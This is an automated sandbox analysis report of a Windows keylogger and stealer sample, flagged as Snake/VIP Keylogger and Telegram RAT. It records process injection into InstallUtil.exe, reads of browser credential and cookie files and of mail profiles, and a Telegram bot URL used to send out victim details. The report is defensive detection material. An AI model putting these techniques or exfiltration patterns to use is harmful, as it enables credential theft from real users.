                    Source: InstallUtil.exe, 0000000A.00000002.2526451432.0000000001027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 234343455GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0500BC6C CheckRemoteDebuggerPresent,1_2_0500BC6C
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B43008Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeQueries volume information: C:\Users\user\Desktop\sS7Jrsk0Z7.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		Windows Management Instrumentation1
                    Valid Accounts                    		1
                    Valid Accounts                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		111
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		1
                    Valid Accounts                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
                    Process Injection                    		1
                    Access Token Manipulation                    		Security Account Manager141
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                    Virtualization/Sandbox Evasion                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                    Process Injection                    		Cached Domain Credentials13
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Hidden Files and Directories                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Obfuscated Files or Information                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    DLL Side-Loading                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    sS7Jrsk0Z7.exe75%ReversingLabsWin32.Trojan.DarkTortilla
                    sS7Jrsk0Z7.exe65%VirustotalBrowse
                    sS7Jrsk0Z7.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		104.21.64.1
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		158.101.44.242
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2012/01/2025%20/%2019:38:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high
                                http://checkip.dyndns.org/false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabInstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgInstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botsS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.office.com/lBInstallUtil.exe, 0000000A.00000002.2528573106.0000000002D63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.orgInstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://chrome.google.com/webstore?hl=enInstallUtil.exe, 0000000A.00000002.2528573106.0000000002D27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
